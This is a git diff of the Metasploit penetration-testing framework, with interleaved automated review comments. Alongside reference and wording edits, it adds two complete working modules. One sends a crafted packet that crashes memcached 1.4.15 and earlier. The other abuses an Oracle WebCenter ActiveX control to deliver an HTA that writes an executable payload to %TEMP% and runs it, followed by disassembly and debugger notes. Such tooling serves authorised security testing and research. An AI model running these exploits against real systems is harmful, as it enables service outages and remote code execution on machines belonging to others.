diff --git a/Gemfile b/Gemfile
index 7e44826e0a..42853b4bd9 100755
--- a/Gemfile
+++ b/Gemfile
@@ -15,7 +15,7 @@ group :db do
 # Needed for Msf::DbManager
 gem 'activerecord'
 # Database models shared between framework and Pro.
- gem 'metasploit_data_models', '~> 0.15.1'
+ gem 'metasploit_data_models', '~> 0.15.2'
 # Needed for module caching in Mdm::ModuleDetails
 gem 'pg', '>= 0.11'
 end
diff --git a/Gemfile.lock b/Gemfile.lock
index 632b53cfde..eab842184d 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -23,7 +23,7 @@ GEM
 i18n (0.6.1)
 json (1.7.7)
 metaclass (0.0.1)
- metasploit_data_models (0.15.1)
+ metasploit_data_models (0.15.2)
 activerecord (>= 3.2.13)
 activesupport
 pg
@@ -65,7 +65,7 @@ DEPENDENCIES
 database_cleaner
 factory_girl (>= 4.1.0)
 json
- metasploit_data_models (~> 0.15.1)
+ metasploit_data_models (~> 0.15.2)
 msgpack
 nokogiri
 pcaprub
diff --git a/modules/auxiliary/dos/misc/memcached.rb b/modules/auxiliary/dos/misc/memcached.rb
new file mode 100644
index 0000000000..efaacf64ea
--- /dev/null
+++ b/modules/auxiliary/dos/misc/memcached.rb
@@ -0,0 +1,68 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::Tcp
+ include Msf::Auxiliary::Dos
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Memcached Remote Denial of Service',
+ 'Description' => %q{
+ This module sends a specially-crafted packet to cause a
+ segmentation fault in memcached v1.4.15 or earlier versions.
+ },
+ 'References' =>
+ [
+ [ 'URL', 'https://code.google.com/p/memcached/issues/detail?id=192' ],
+ [ 'CVE', '2011-4971' ],
+ [ 'OSVDB', '92867' ]
+ ],
+ 'Author' => [ 'Gregory Man ' ],
+ 'License' => MSF_LICENSE
+ ))
+
+ register_options([Opt::RPORT(11211),], self.class)
+ end
+
+ def is_alive?
+ begin
+ connect
+ disconnect
+ rescue Rex::ConnectionRefused
+ return false
+ end
+
+ return true
+ end
+
+ def run
+ connect
+ pkt = "\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff\xe8\x00\x00\x00\x00"
+ pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00"
+ pkt << "\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+ pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+
+ print_status("#{rhost}:#{rport} - Sending dos packet...")
+ sock.put(pkt)
+ disconnect
+
+ print_status("#{rhost}:#{rport} - Checking host status...")
+ select(nil, nil, nil, 1)
+
+ if is_alive?
+ print_error("#{rhost}:#{rport} - The DoS attempt did not work, host is still alive")
+ else
+ print_good("#{rhost}:#{rport} - Tango down") # WWJS - What would th3j35t3r say?
+ end
+ end
+end
diff --git a/modules/auxiliary/scanner/couchdb/couchdb_login.rb b/modules/auxiliary/scanner/couchdb/couchdb_login.rb
index 4d7ddc0c32..4696dfc8db 100644
--- a/modules/auxiliary/scanner/couchdb/couchdb_login.rb
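Review bot: `is_alive?` rescues only `Rex::ConnectionRefused`, so if the post-DoS `connect` times out or the host is unreachable the exception propagates out of `run` instead of producing a host-status verdict; rescuing the base class covers those cases: `rescue Rex::ConnectionError` in place of `rescue Rex::ConnectionRefused`. The `is_` prefix and the explicit `return`s are non-idiomatic; a predicate named `alive?` that returns the value of the begin/rescue directly reads better. `select(nil, nil, nil, 1)` used as a one-second pause is normally written `Rex.sleep(1)` in framework modules.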
+++ b/modules/auxiliary/scanner/couchdb/couchdb_login.rb @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'CouchDB Login Utility', 'Description' => %{ - This module will test CouchDB logins on a range of + This module tests CouchDB logins on a range of machines and report successful logins. }, 'Author' => diff --git a/modules/auxiliary/scanner/http/svn_scanner.rb b/modules/auxiliary/scanner/http/svn_scanner.rb index eb5cc779d7..cd751c7b9c 100644 --- a/modules/auxiliary/scanner/http/svn_scanner.rb +++ b/modules/auxiliary/scanner/http/svn_scanner.rb @@ -117,7 +117,7 @@ class Metasploit3 < Msf::Auxiliary print_status("[#{target_host}] NOT Found. #{tpath} #{res.code}") end else - print_status("[#{target_host}] SVN Entries file found.") + print_good("[#{target_host}:#{rport}] SVN Entries file found.") report_web_vuln( :host => target_host, diff --git a/modules/exploits/linux/http/esva_exec.rb b/modules/exploits/linux/http/esva_exec.rb index 85f6638095..ddaf1092d7 100644 --- a/modules/exploits/linux/http/esva_exec.rb +++ b/modules/exploits/linux/http/esva_exec.rb @@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote ], 'References' => [ + [ 'OSVDB', '85462'], [ 'BID', '55050'], [ 'EDB', '20551' ] ], diff --git a/modules/exploits/linux/http/mutiny_frontend_upload.rb b/modules/exploits/linux/http/mutiny_frontend_upload.rb index d793948709..cf011a1edf 100644 --- a/modules/exploits/linux/http/mutiny_frontend_upload.rb +++ b/modules/exploits/linux/http/mutiny_frontend_upload.rb @@ -35,6 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ [ 'CVE', '2013-0136' ], + [ 'OSVDB', '93444' ], [ 'US-CERT-VU', '701572' ], [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/05/15/new-1day-exploits-mutiny-vulnerabilities' ] ], diff --git a/modules/exploits/linux/http/symantec_web_gateway_exec.rb b/modules/exploits/linux/http/symantec_web_gateway_exec.rb index 10a211bc13..d40bed2db6 100644 
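Review bot: In the svn_scanner.rb hunk the new `print_good` line prefixes its message with `[#{target_host}:#{rport}]`, while the sibling `print_status("[#{target_host}] NOT Found. #{tpath} #{res.code}")` two context lines above keeps the host-only prefix, so the two outcomes of the same check now log in different formats. Make the prefix uniform, e.g. `print_status("[#{target_host}:#{rport}] NOT Found. #{tpath} #{res.code}")`. The enclosing method starts and ends outside the hunk.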
--- a/modules/exploits/linux/http/symantec_web_gateway_exec.rb
+++ b/modules/exploits/linux/http/symantec_web_gateway_exec.rb
@@ -30,6 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'References' =>
 [
 [ 'CVE', '2012-0297' ],
+ [ 'OSVDB', '82925' ],
 [ 'BID', '53444' ],
 [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-090' ],
 [ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00' ]
diff --git a/modules/exploits/linux/http/vcms_upload.rb b/modules/exploits/linux/http/vcms_upload.rb
index 8ed47f8b1b..2bf0f7e60d 100644
--- a/modules/exploits/linux/http/vcms_upload.rb
+++ b/modules/exploits/linux/http/vcms_upload.rb
@@ -36,6 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'References' =>
 [
 ['CVE', '2011-4828'],
+ ['OSVDB', '77183'],
 ['BID', '50706'],
 ['URL', 'http://bugs.v-cms.org/view.php?id=53'],
 ['URL', 'http://xforce.iss.net/xforce/xfdb/71358']
diff --git a/modules/exploits/linux/local/kloxo_lxsuexec.rb b/modules/exploits/linux/local/kloxo_lxsuexec.rb
index 6605bc7380..4619a132f7 100644
--- a/modules/exploits/linux/local/kloxo_lxsuexec.rb
+++ b/modules/exploits/linux/local/kloxo_lxsuexec.rb
@@ -46,6 +46,7 @@ class Metasploit4 < Msf::Exploit::Local
 'References' =>
 [
 [ 'EDB', '25406' ],
+ [ 'OSVDB', '93287' ],
 [ 'URL', 'http://roothackers.net/showthread.php?tid=92' ] # post referencing the vulnerability and PoC
 ],
 'Targets' =>
diff --git a/modules/exploits/linux/local/sock_sendpage.rb b/modules/exploits/linux/local/sock_sendpage.rb
index 576d6c20a2..1aade0af6a 100644
--- a/modules/exploits/linux/local/sock_sendpage.rb
+++ b/modules/exploits/linux/local/sock_sendpage.rb
@@ -62,6 +62,7 @@ class Metasploit4 < Msf::Exploit::Local
 'References' =>
 [
 [ 'CVE', '2009-2692' ],
+ [ 'OSVDB', '56992' ],
 [ 'URL', 'http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html' ],
 [ 'URL', 'http://www.grsecurity.net/~spender/wunderbar_emporium2.tgz' ],
 ],
diff --git a/modules/exploits/multi/http/struts_include_params.rb b/modules/exploits/multi/http/struts_include_params.rb index 6d9a97bfe2..d17b2ac3f9 100644 --- a/modules/exploits/multi/http/struts_include_params.rb +++ b/modules/exploits/multi/http/struts_include_params.rb @@ -21,10 +21,10 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a remote command execution vulnerability in Apache Struts versions < 2.3.14.2. A specifically crafted request parameter can be used to inject arbitrary OGNL code into the stack bypassing Struts and OGNL library protections. - When targeting an action which requires interaction through GET the payload should - be split having into account the uri limits. In this case, if the rendered jsp has - more than one point of injection, it could result in payload corruption. It should - happen only when the payload is larger than the uri length. + When targeting an action which requires interaction through GET, the payload should + be split, taking into account the URI limits. In this case, if the rendered JSP has + more than one point of injection, it could result in payload corruption. This should + happen only when the payload is larger than the URI length. }, 'Author' => [ diff --git a/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb b/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb new file mode 100644 index 0000000000..8c38681fcd --- /dev/null +++ b/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb 
@@ -0,0 +1,262 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::EXE + + def initialize(info={}) + super(update_info(info, + 'Name' => "Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution", + 'Description' => %q{ + This modules exploits a vulnerability found in the Oracle WebCenter Content + CheckOutAndOpenControl ActiveX. This vulnerability exists in openWebdav(), where + user controlled input is used to call ShellExecuteExW(). This module abuses the + control to execute an arbitrary HTA from a remote location. This module has been + tested successfully with the CheckOutAndOpenControl ActiveX installed with Oracle + WebCenter Content 11.1.1.6.0. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'rgod ', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2013-1559' ], + [ 'OSVDB', '92386' ], + [ 'BID', '59122' ], + [ 'URL', 'http://www.oracle.com/technetwork/topics/security/cpuapr2013-1899555.html' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-094/' ] + ], + 'Payload' => + { + 'Space' => 2048, + 'StackAdjustment' => -3500 + }, + 'DefaultOptions' => + { + 'InitialAutoRunScript' => 'migrate -f -k' + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Automatic', {} ] + ], + 'Privileged' => false, + 'DisclosureDate' => "Apr 16 2013", + 'DefaultTarget' => 0)) + end + + def exploit + @var_exename = rand_text_alpha(5 + rand(5)) + ".exe" + @dropped_files = [ + @var_exename + ] + super + end + + def on_new_session(session) + if session.type == "meterpreter" + session.core.use("stdapi") unless session.ext.aliases.include?("stdapi") + end + + @dropped_files.delete_if do |file| + win_file = file.gsub("/", "\\\\") + if session.type == "meterpreter" + begin + wintemp = session.fs.file.expand_path("%TEMP%") + win_file = "#{wintemp}\\#{win_file}" + session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|) + session.fs.file.rm(win_file) + print_good("Deleted #{file}") + true + rescue ::Rex::Post::Meterpreter::RequestError + print_error("Failed to delete #{win_file}") + false + end + + end + end + end + + def build_hta(cli) + var_shellobj = rand_text_alpha(rand(5)+5); + var_fsobj = rand_text_alpha(rand(5)+5); + var_fsobj_file = rand_text_alpha(rand(5)+5); + var_vbsname = rand_text_alpha(rand(5)+5); + var_writedir = rand_text_alpha(rand(5)+5); + + var_origLoc = rand_text_alpha(rand(5)+5); + var_byteArray = rand_text_alpha(rand(5)+5); + var_writestream = rand_text_alpha(rand(5)+5); + var_strmConv = rand_text_alpha(rand(5)+5); + + p = regenerate_payload(cli); + exe = generate_payload_exe({ :code => p.encoded }) + + # Doing in this way to bypass the 
ADODB.Stream restrictions on JS, + # even when executing it as an "HTA" application + # The encoding code has been stolen from ie_unsafe_scripting.rb + print_status("Encoding payload into vbs/javascript/hta..."); + + # Build the content that will end up in the .vbs file + vbs_content = Rex::Text.to_hex(%Q| +Dim #{var_origLoc}, s, #{var_byteArray} +#{var_origLoc} = SetLocale(1033) +|) + # Drop the exe payload into an ansi string (ansi ensured via SetLocale above) + # for conversion with ADODB.Stream + vbs_ary = [] + # The output of this loop needs to be as small as possible since it + # gets repeated for every byte of the executable, ballooning it by a + # factor of about 80k (the current size of the exe template). In its + # current form, it's down to about 4MB on the wire + exe.each_byte do |b| + vbs_ary << Rex::Text.to_hex("s=s&Chr(#{("%d" % b)})\n") + end + vbs_content << vbs_ary.join("") + + # Continue with the rest of the vbs file; + # Use ADODB.Stream to convert from an ansi string to it's byteArray equivalent + # Then use ADODB.Stream again to write the binary to file. 
+ #print_status("Finishing vbs..."); + vbs_content << Rex::Text.to_hex(%Q| +Dim #{var_strmConv}, #{var_writedir}, #{var_writestream} + #{var_writedir} = WScript.CreateObject("WScript.Shell").ExpandEnvironmentStrings("%TEMP%") & "\\#{@var_exename}" + +Set #{var_strmConv} = CreateObject("ADODB.Stream") + +#{var_strmConv}.Type = 2 +#{var_strmConv}.Charset = "x-ansi" +#{var_strmConv}.Open +#{var_strmConv}.WriteText s, 0 +#{var_strmConv}.Position = 0 +#{var_strmConv}.Type = 1 +#{var_strmConv}.SaveToFile #{var_writedir}, 2 + +SetLocale(#{var_origLoc})|) + + hta = <<-EOS + + EOS + + return hta + end + + def on_request_uri(cli, request) + agent = request.headers['User-Agent'] + + if agent !~ /MSIE \d/ + print_error("Browser not supported: #{agent.to_s}") + send_not_found(cli) + return + end + + print_status("Request received for #{request.uri}"); + + if request.uri =~ /\.hta$/ + hta = build_hta(cli) + print_status("Sending HTA application") + send_response(cli, hta, {'Content-Type'=>'application/hta'}) + return + end + + uri = "#{get_uri}#{rand_text_alpha(rand(3) + 3)}.hta" + + html = <<-EOS + + + + + + + EOS + + print_status("Sending HTML") + send_response(cli, html, {'Content-Type'=>'text/html'}) + + end + +end + +=begin + +* The vulnerable control tries to solve how to open the provided extension + +.text:100099FC lea eax, [ebp+830h+Src] +.text:10009A02 push eax ; lpResult +.text:10009A03 lea eax, [ebp+830h+Directory] +.text:10009A06 push eax ; lpDirectory +.text:10009A07 lea eax, [ebp+830h+PathName] +.text:10009A0D push eax ; lpFile +.text:10009A0E call ds:FindExecutableW ; This function returns the executable associated with the specified file for the default verb + +* If succeeds, the provided user data is used as argument: + +.text:10009D8F lea eax, [ebp+psz] +.text:10009D95 mov [ebp+pExecInfo.lpFile], eax +.text:10009D9B mov eax, [ebp+var_238] +.text:10009DA1 mov [ebp+pExecInfo.cbSize], 3Ch +.text:10009DAB mov [ebp+pExecInfo.fMask], 2000000h +.text:10009DB5 mov 
[ebp+pExecInfo.hwnd], ebx +.text:10009DBB mov [ebp+pExecInfo.lpVerb], offset aOpen ; "open" +.text:10009DC5 jnb short loc_10009DCD +.text:10009DC7 lea eax, [ebp+var_238] +.text:10009DCD +.text:10009DCD loc_10009DCD: ; CODE XREF: make_ShellExecute_sub_10009ACC+2F9j +.text:10009DCD mov [ebp+pExecInfo.lpParameters], eax +.text:10009DD3 lea eax, [ebp+pExecInfo] +.text:10009DD9 push eax ; pExecInfo +.text:10009DDA mov [ebp+pExecInfo.lpDirectory], ebx +.text:10009DE0 mov [ebp+pExecInfo.nShow], 0Ah +.text:10009DEA call ds:ShellExecuteExW + +* On the debugger: + +Breakpoint 1 hit +eax=0201ef6c ebx=00000000 ecx=00000000 edx=03850608 esi=00000008 edi=00000000 +eip=10009dea esp=0201ee08 ebp=0201f200 iopl=0 nv up ei pl nz ac po nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212 +CheckOutAndOpen!DllUnregisterServer+0x7108: +10009dea ff156cd20210 call dword ptr [CheckOutAndOpen!DllUnregisterServer+0x2a58a (1002d26c)] ds:0023:1002d26c={SHELL32!ShellExecuteExW (7ca02f03)} +0:007> dd esp +0201ee08 0201ef6c <== pExecInfo +0:007> dd 0201ef6c +0201ef6c 0000003c 02000000 00000000 10031468 +0201ef7c 0201efe0 03854688 +0:007> du 0201efe0 +0201efe0 "C:\WINDOWS\system32\mshta.exe" +0:007> du 03854688 +03854688 ""http://192.168.172.1:8080/xKRTv" +038546c8 "m0mqpAt7sEYdVq.hta"" + +This code allows to launch other executables with user data provided as argument, but at the moment I like the HTA +solution because it allows to pass URL's as arguments. And code executed by mshta is on a privileged zone. Other +executables allow to provide SMB URI's but metasploit only allow to 'simulate' a SMB resource through webdav, so +the target should have the WebClient service enabled, which is only enabled by default on XP SP3. +=end \ No newline at end of file diff --git a/modules/exploits/windows/misc/lianja_db_net.rb b/modules/exploits/windows/misc/lianja_db_net.rb index c8ac95160a..439e2e3708 100644 --- a/modules/exploits/windows/misc/lianja_db_net.rb 
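Review bot: In `on_new_session` of oracle_webcenter_checkoutandopen.rb, the `delete_if` block only handles meterpreter sessions; for any other session type it falls through with `nil`, so the dropped executable stays in `@dropped_files` and the operator gets no message that cleanup was skipped. An explicit branch such as `else print_warning("Not deleting #{win_file} from a #{session.type} session"); false` would make that visible. The trailing semicolons in `build_hta` (`var_shellobj = rand_text_alpha(rand(5)+5);` and the following assignments, `print_status("Encoding payload into vbs/javascript/hta...");`) and in `on_request_uri` (`print_status("Request received for #{request.uri}");`) are non-idiomatic Ruby and should be dropped. The `=begin … =end` analysis block is useful, but the methods themselves are undocumented; a one-line comment above `build_hta` and `on_request_uri` saying what each one builds or serves (`# Builds the HTA that writes the payload to %TEMP% and runs it` / `# Serves the HTA for *.hta requests, the loader page otherwise`) would help readers.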
+++ b/modules/exploits/windows/misc/lianja_db_net.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
 super(update_info(info,
 'Name' => 'Lianja SQL 1.0.0RC5.1 db_netserver Stack Buffer Overflow',
 'Description' => %q{
- This module exploits a stack buffer overflow in the db_netserver process which
+ This module exploits a stack buffer overflow in the db_netserver process, which
 is spawned by the Lianja SQL server. The issue is fixed in Lianja SQL 1.0.0RC5.2.
 },
 'Author' => 'Spencer McIntyre',